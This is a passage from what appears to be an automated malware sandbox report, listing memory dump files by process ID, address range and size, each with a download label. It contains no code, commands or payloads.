                        • memory/4128-243-0x0000000000400000-0x0000000000495000-memory.dmp
                          Filesize

                          596KB

                          Download
                        • memory/4216-590-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4244-269-0x0000000007D30000-0x0000000007D31000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/4244-280-0x0000000009A90000-0x0000000009A91000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/4244-283-0x0000000009600000-0x000000000975B000-memory.dmp
                          Filesize

                          1.4MB

                          Download
                        • memory/4244-259-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4244-282-0x0000000006C13000-0x0000000006C14000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/4244-270-0x0000000006C10000-0x0000000006C11000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/4244-271-0x0000000006C12000-0x0000000006C13000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/4280-671-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4308-604-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4368-616-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4412-673-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4476-669-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4476-293-0x0000000004E30000-0x0000000004E31000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/4476-326-0x0000000004E33000-0x0000000004E34000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/4476-284-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4476-325-0x000000007F710000-0x000000007F711000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/4476-294-0x0000000004E32000-0x0000000004E33000-memory.dmp
                          Filesize

                          4KB

                          Download
                        • memory/4500-627-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4512-623-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4552-625-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4564-538-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4620-629-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4740-638-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4764-543-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4784-562-0x0000000005690000-0x0000000005B8E000-memory.dmp
                          Filesize

                          5.0MB

                          Download
                        • memory/4784-546-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4812-642-0x000000000047B92E-mapping.dmp
                          Download
                        • memory/4812-648-0x0000000005100000-0x00000000055FE000-memory.dmp
                          Filesize

                          5.0MB

                          Download
                        • memory/4840-631-0x000001A27BC20000-0x000001A27BC40000-memory.dmp
                          Filesize

                          128KB

                          Download
                        • memory/4840-555-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4840-630-0x000001A27BC00000-0x000001A27BC20000-memory.dmp
                          Filesize

                          128KB

                          Download
                        • memory/4840-572-0x00007FFA0F6D0000-0x00007FFA0F6D2000-memory.dmp
                          Filesize

                          8KB

                          Download
                        • memory/4840-580-0x000001A27BBE0000-0x000001A27BC00000-memory.dmp
                          Filesize

                          128KB

                          Download
                        • memory/4856-556-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4900-647-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4908-566-0x0000000000000000-mapping.dmp
                          Download
                        • memory/5028-651-0x0000000000000000-mapping.dmp
                          Download
                        • memory/5056-652-0x0000000000000000-mapping.dmp
                          Download
                        • memory/5056-661-0x0000000005090000-0x000000000512C000-memory.dmp
                          Filesize

                          624KB

                          Download
                        • memory/5080-577-0x0000000000000000-mapping.dmp
                          Download
                        • memory/5096-663-0x0000000000000000-mapping.dmp
                          Download